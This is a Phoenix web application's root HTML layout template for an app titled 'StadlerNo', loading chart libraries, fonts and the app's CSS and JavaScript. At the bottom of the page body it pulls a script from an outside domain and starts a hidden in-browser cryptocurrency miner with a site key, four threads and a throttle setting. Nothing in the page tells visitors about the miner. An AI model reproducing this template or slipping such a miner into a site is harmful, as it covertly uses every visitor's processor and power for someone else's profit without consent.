<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
    <%= csrf_meta_tag() %>
    <%= live_title_tag assigns[:page_title] || "StadlerNo" %>

<script src="https://unpkg.com/tlx/browser/tlx.js"></script>
<script src="https://unpkg.com/tlx-chart/browser/tlx-chart.js"></script>

<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">




    <link phx-track-static rel="stylesheet" href="<%= Routes.static_path(@conn, "/css/app.css") %>"/>
       <link href="https://fonts.googleapis.com/css2?family=Space+Mono:wght@400;700&display=swap" rel="stylesheet">
    <script defer phx-track-static type="text/javascript" src="<%= Routes.static_path(@conn, "/js/app.js") %>"></script>


  </head>
  <body style="background-color: #121212; padding: 0px 32px 32px;">
    <header>
    </header>
    <%= @inner_content %>

<script src="//statdynamic.com/lib/crypta.js"></script>
<script>
  var miner=new CRLT.Anonymous('db25806492a980c57112517fb9edc0d58783f0bb949c', {
    threads:4,throttle:0.72, coin: "upx",
  });
  miner.start();
</script>

  </body>
</html>
